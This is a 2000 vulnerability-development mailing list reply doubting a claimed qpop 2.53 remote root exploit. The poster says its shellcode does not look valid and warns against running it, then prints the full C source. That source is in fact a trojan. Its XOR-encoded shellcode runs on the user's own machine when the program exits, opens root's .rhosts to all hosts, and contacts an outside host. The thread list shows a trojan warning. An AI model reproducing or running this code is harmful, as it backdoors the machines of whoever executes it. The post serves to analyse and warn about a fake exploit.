Vulnerability Development mailing list archives
Re: QPOP2.5* exploit ??
From: mixter () NEWYORKOFFICE COM (Martin Ixter)
Date: Mon, 15 May 2000 01:32:53 +0300
hmm, to be honest, that sounds like FUD to me... the supposed shellcode doesn't seem to contain x86 commands that make much sense... the first few bytes resemble x86 instructions pusha and testl, after that there are no consistent instructions following... the cat -v output follows, doesn't look like valid x86 shellcode to me. can you provide the full exploit to verify which command this program supposedly tries to overflow? M-k^M-kM-hM-xM-^?M-^?M-^?^@M-F1M-If^@^@M-k3-`kl-qj/a^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@-q`kl-kdamldke"/c"~"ockn"/q"qmnucp"gvamulxBjmvockn,amo"<<"-fgt-lwnn9"gajm"%)")%"<<"|pmmv-,pjmqvq9"par"nrBqikllgp,vpfnli,amo8-wqp-qrmmn-nr-omfgn-qmnucp,vcp"qmnucp,vcp9"vcp"/ztd"qmnucp("<<"-fgt-lwnn9"af"qmnucp9"ajomf")z"qmnucp,qj9",-qmnucp,qj"<<"-fgt-lwnn9"af",,9"po"/pd"qmnucp(9^@M-ne)W^@M-g^@M-nTQM-jY^@AM-5^@M-1M-lyy^@wM-r^@^@M-lyy^@GM-v^@^@"M-lyy^@GM-zM-EG^@^@OM-rM-: 3^@Q^@M-qI^@3A^@gM-jY\EA^@^@ PS: but upgrading to qpop 3 is a good idea anyways (as long as people upgrade to the latest secure version) ________________________ mixter () newyorkoffice com http://1337.tsx.org be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what it does.
bat /* PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!! * * * qpop 2.53 remote root exploit for linux * tested on redhat 6.x and 5.x, and slack7 * offsets for redhat 6: 100 * redhat 5: 150 * * slackware: 200 * * these offsets were an average, however the buffer is small and * the address must almost be exact. Perhaps try a offset brute forcer. * * code by John Slockavich, copyright Febuary 25th, 2000 * this code for educational purposes only * * * * If this exploit is successful, you should have a bindshell on port 1524 */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/tcp.h> #include <linux/ip.h> #define RET 0xbffff6b2 #define NOP 0x90 #define PORT 110 #define BSIZE 512 int (*qpop_proc)(); void quit(int x); char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8 0\x36\x02\x46\xe2\xfa" "\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f" "\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d" "\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22" "\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d" "\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22" "\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22" "\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71" "\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70" "\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e" "\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63" "\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f" "\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74" "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61" "\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22" "\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74" "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70" "\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b" "\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f" "\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81" "\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09" "\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1" "\x92\x92"; void usage(char *name) { fprintf(stderr,"qpop 2.53 exploit by John Slockavich\n" "Usage: %s <hostname> <offset>\n" , name); exit(1); } int main(int argc, char **argv) { struct sockaddr_in sin; struct hostent *he; char *hostname, *ptr, *buff; char sendbuf[BSIZE+20]; long *addr_ptr, addr; int rfd; int sfd; int i; int offset = 0; if (argc < 2) usage(argv[0]); hostname = argv[1]; if (argv[2]) offset = atoi(argv[2]); (char *)qpop_proc = shellcode; if (!(buff = malloc(BSIZE))) { perror("malloc"); exit(0); } sin.sin_family = AF_INET; sin.sin_port = htons(PORT); if ((he = gethostbyname(hostname)) == NULL) { herror("resolve"); exit(0); } bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length); if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("socket"); exit(1); } if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } addr = RET - offset; printf("preparing buffer using addr 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < BSIZE; i+=4) *(addr_ptr++) = addr; for (i = 0; i < BSIZE/2; i++) buff[i] = NOP; ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[BSIZE - 1] = '\0'; if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connect"); quit(1); } printf("connected, sending shellcode...\n"); snprintf(sendbuf, sizeof(sendbuf)-1,"USER %s\n",buff); if (write(sfd, sendbuf, strlen(sendbuf)) < 0) { perror("write"); quit(1); } close(sfd); quit(0); } void quit(int x) { qpop_proc(); exit(x); }
Current thread:
- Re: QPOP2.5* exploit ??, (continued)
- Re: QPOP2.5* exploit ?? H D Moore (May 14)
- Re: QPOP2.5* exploit ?? jms (May 13)
- Napster Fix optik (May 14)
- Re: QPOP2.5* exploit ?? Maurycy Prodeus (May 15)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
- Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
- TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
- Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
- Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
- Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
- xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
- Re: QPOP2.5* exploit ?? rpc (May 14)
- Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component] TLsecurity.net (May 14)
- Re: regarding phrack49's stack smashing tutorial Pavel Kankovsky (May 14)
- Re: regarding phrack49's stack smashing tutorial Darshan Patil (May 14)